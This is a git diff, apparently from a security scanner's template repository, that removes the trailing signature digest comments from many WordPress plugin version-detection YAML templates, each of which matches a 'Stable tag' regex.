b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cb8914d69a7374ec4a2d2622b94fbdade604584f80b5111674634709b22bbb1a022038f8acf304d6699d56781d498096bb3430d9f61f291db696f37edd08f382914a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index f8d7a559f3..f68ad2a6bf 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220562691836a3e85ca94dfb2cd957b5470318ca28397a1ba88e58c8ae347144585022100dc66b57f9c6affcec4616b0a98b83f48c038b20d584b17790b0ea0178a617eb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index e17b3a20a0..196cc7e8e8 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201d3429257b44354a13bef4662fc5f9dd412bebd328a15140b163ed9cd9968518022075bd49e4caf3274a3bee06d9e98c7cb5b599359256759fe69e241e3ca8913add:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 6d86c8c3f2..55362630df 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202e0f5e6cf193e6b876b916910dd7f522a83f5f1a35ad6fe4f26204471637cb84022100ab04170e075609b817481ff01d6651b4df95c3403376217203f9445b4cb6e238:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index ec20093d1f..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c17c8d1287a04824c16deb38da9b015cc8cda11c30ddbded630c95acc07ae035022100bdb67d8ad13939395caed9a94d1a783c2b403df40cda6df4f3dc6e43e4683e3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 4c12f9bdd4..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210083df70136f7ddaf7a2774c830af926707fb905b195007d6276348caf7955c8f802200259fa04a4fc3922007793e66cff2ca0442c9f490d69536d17204536ed1a7568:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 916ff43824..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201b66e9befabcd88485013f683657c4f807560ef9a564a3fe39198adbb207ecfe02204ce3154fc181214aac0f24260a11df0fb8fb9f6ef9c9f9f69927814305fae9f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 3ec54334fb..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009d6737dcf130bb02241795b73bdbe7fc3bd70b1555e6e7ec9effa4430a60d87a022100b6ec279595e6cf11cabe64b227588eda8e83718905f32debe2b34fcbb9d82460:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index dc2d3466e6..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ece662cc7606b195fa3aadbb7803a866cbb017f2fb1b5144cd28176a1e114dcd022100b55835d169a363daba29115f212d819d601536859c63bcb5a03fb5c176ac58b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 028892e2a0..f76b750bf6 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a7a7ca37545860e22681639441c877cf27c3845c4ff27faec4322c15a7b9ff8f0221008cb43b629196f51a030e3a54a4c19acf591cb226f153c95275768803beade859:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f5f47b2ef8..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009dce85f2123d81cb25095b89073e7a365a4bac9b5840e36cbaee03df22cb3b1a022065234a65ffa6ef7f36b936dec1b60501fa45188367290ccf28dea2ecaa4431e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 8e68a12a04..d1e01c329b 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100834ff3568169ae9273363c59f25384ad26a109702aeb8138eff3f5a771fdda01022100dd101600945eeb7cf9ca24b2e7ac929ccf664c02f4fedda7ea409485944f3076:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index d88c8fe459..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b882f711bc2a1a9f5c6146c00d45e180696b94b438823a2017fdbb61294d187a022063ef87a67386854e94c6e654ecca306279e0d519c6eb566be475d97f3b2935be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index ec0e94499b..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c67782ef853864713d48588c92f2691ef5e444db68121913bffbc754e619b365022100d81a32eba6246f004f0be086f2d1591eb087a3c59cbd194f6dca298d23dfd208:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 61d9c6d325..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ef7039f638d3c9ec7a9d30490c87546fdb7d0d9048cb4bdac8ecda6ff66e5e4b022100f0e174ff673e7fe7a17ee7cd042ded660c332d66faa876806123bd3ebc526b47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e56dbd99d..f3aae5f624 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022024241ce700d4e66ef15fd836eb003924f0cc12ea46f11c75f595c82348323933022068688588cae57f9b42c4312028240049d277eaf3474a20eb04d2d086e88d0535:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index c102498884..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201c44c0282a12da5babf49642764344a38d9f84bb61e62b3efd23880b265c35ad02202c4c88ed88b266d9e62e6dd81c365644dd9dc31391d296f334ea95f9d6af14cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index b07a115723..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a113cedbbb2886765a7c3db0461041abd0ad212d5d9278c963b6aeb4fc83a054022100f3bb74a03f8a9e4806e2cee3d76d66d8926d25bba381dd81f763e77a1a4c79bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 0fa0c911a7..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200793259c659fca7a929a8f56e1290eafb0c1b3c07663059ca2f307915151353c0220690605c0fabb8dab1bad979d2d78baa94f93ea14b83391e6944c0f8785ac82ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index f6f7a72b65..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022001adc03d3b989e8d07ce55b19b0fb61ea813cff7a2c463f3a7028f0795302de7022057f17ec5d726fb2fcdbf6a85c0c340485a87ae3be4b67052273112a4a0ed11bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c7fd2c5e17..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220740a03c2af11fbb227ecb7e2422db1a7c46a7ccbd6f7f054b3a07c73afeeafd5022100c405981974c23fdcc07e9c502fadd962df416ebf307a9deba7c43e9770949810:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 1cb97b65e9..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022066711c9810c3b5fee89683c846feb15b467602cd22bb6e8bfc2adacdfb6cb06d022100f71224c339581a949fa7979dbf699d64aa683cab832aea1158cb46c8ff0e9ded:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index c7bc973789..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009521b2ba258347f0435593990ae5ec1ebe1268442126ea9d9058dc8470e14116022100f16c4de57107d947d72f1753035300f8bedaede4e41d06091906e6c1752a337c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 73e7273086..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c7025a66c3dd94d81e25dec09767de9fb27385222aa18d57ab1a939a95b3a6a90220306d2622d13b9aabf25c6a774ebfcf71c7f6fd326fc505c4f99f23af8381728a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index b6af028fac..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202e447fdf008ebbcae01890b27fdb0697407957e76e1c7da64f86c343fb8d6ade02204e434d98277d60d335ce5bdd50d8404dd35a47485a43cfdc67c9f866d12080f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 74e3b6a4a6..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d494f810a6f4d5fc4563c81e168b46586be799429262544cf909aa1786bc24dc022100847b68c12c45f846a3d74a85cd7b331d1832340ca7f6ccce32e43636482f9325:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 57dca5503e..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203aa1520ae065e7d3396d9a2b9cd38ba7b54611ed562f8f50962021ab414803ad022100dcbbf55ef56b06b3f992d684ac373464235b95472a766ffe22ee3c67e68f0195:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 85337d6a4f..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ff6b602f997149a9645fc94dab2abb666008e1145c986049db08510ce0f26606022100bd2b57473d14e688278447322737b3c1733a73ba07725580c4c8fc36101d0079:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 795b436050..d94b4228a9 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fae3c23257c786cb7d368f3c70724bd279f2b0f09961bb8123a519fa7780f5b002204027c0dbbc4acbe4769d8d54739dda2dc401eff8ea88c62f4b61ca4c5dba914e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index e21c6a8557..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a19e4f1f5a40b85e624c6d82f78dd7f6ceb20a2f08f6f127bf35f9da704123f402201fa8e38f5de252424f0bd63092e0eae961465c648a1cc8aec9872ec757900022:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index d53d241efb..1b4769d0a7 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201c41505c2f4e9e9fd0a63bc56336c34c2f3fa54a048dab29a97439aeed58a45b022029e550bc4bcaf71678d29c0279b6964f9e889d49f1b9ac0a9b40e24e4fbeabf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5f54cbbc8a..c2cd4ede1b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017190d4e0600cee35a6039c67f3101f14fb84674502a4a8b3c1f42bda6f3a6d4022100d801f3b6a2915391568421d889b558fd754d91188a16ff669f5674dec1eb675e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 81bb8eb9f3..03e6c13ec5 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d15e4964fb8c658ae9685d92d77e4d9328315278d0c471ebb6619e081301b8e402204b59a0e729515cb9b41976fd399f08e5ef3fe78944c7914929412dd7dc0642ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 3a9de5b880..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220693529eb0b1c99412a37ec348860113ca537dd5630951f218ccf4ad89f0c4dd302202c50e21ed62782f80609090966497262c3f8f15be342e6225cfd4bbc497c32dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index e0ccc515e6..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bf0237828665109f20bea6692c87295471b9d84a08833510b14c39d235b4e24502206455aeb5c0c6a2e3061b6885d97f8e846bef560925a58673af831fd0855d5c6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 1469d6f29f..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fcf841b929ec197bc4af653d60c216e97e91e1e256e23d361ee0a8c073548d31022029616aedf8116b6103de1fd539493ba69e4355fbaad734dd0a590c451154d106:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index a30c641b56..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202875858b23f8bae1f97e11af42b6c1af630dd1d896854c9b962ba95d19517c6c02200770db6ae23592e1ceb41bd51ed95ed78751dca894262c8f0b7764da6cafec0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 8739e18936..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207cb12bed7faffd61d959127002baf122d08bd62fcf91b81141395f02d394ad50022058810ae5b20c2067fe9a44b98a32285dd2bde4d9e09ec4562d9704a26e42bcdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 1a3f74cee0..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022011d66dbf7cb8830c012236b1527c017f34c6e9ac9f218edb1b380f8bca08907e02203ae29ecf77ba15006c61965c28eb657970b8f10a21644ca75e9ecd4ecb2f25cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 5b1a7d5c5e..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022058fb649b37d40f2ce36eaa3e2affaa65b18cad1e3321eda527cf67b72a0b64b6022100cc9fc5793d6b491ea946c10c37b7616ce05cff79caa69a7043ab860822bfe958:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index d308e6ccd3..d74de07e8e 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022008b538e2d23c38518741edb1fca70d615e2bfefd1efcdbdff2faad2647244f45022100e83cfd5137b82f7d699ca56b48ed2a5010e32d87d79009b588fec4b9ce09b9d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 26ef580076..e5cfe47925 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a1b8cb34947641f721882c5b617056770ed24bc424a38e945429c3ca86352f2e022100836a00d3ccc7d9ac9ea047e958f971761a5f106af51260dd47751b4fbfe8f5dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index b5df76c376..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022079e84354ec34b88f2fb6fecb8f175a1d86ce612e77119c65b7bbe1925bce7597022100e7bc9d0a22f2c143563bbdbe2a754c501599af12b46af4ecdde17f88e526cac9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 1c68f31f9d..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206409193310603f4f53f070b32ddab3d2891811f273b8c39d6d3027cf26aae68702205dc3cc9a9dd2ef3f93cfa8afd3f4296b4914dcd40dbbabba1df0ad124951c715:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index b4bcde0605..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cc68e527afc986ccd1b62e02b80be960a368d560fdcfa2409ccb61eec36700e6022100d9fcb8d4b6a6bc4bee0b1eb9560c3ffec7934dc46f43ae17e1d861f30d4f8f05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index abf13dff60..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022055c9538641c7bd08dee5f3cf6cd8d33af8eed8f3a9f8928d23c894addfbce44b0220696813c9a84f506fc8dd43d753b919666219c322c295783726c45a5b53822d4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index ca0dc77afe..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100da36672ae5d8a58333e5b5828608e52371b482be0bb9b1825066f917257db07602200de6fab28e8cb977242e4957f5ca7e34985e33fe0758927f8bdbe5327f8cb957:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index ce49e72efd..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 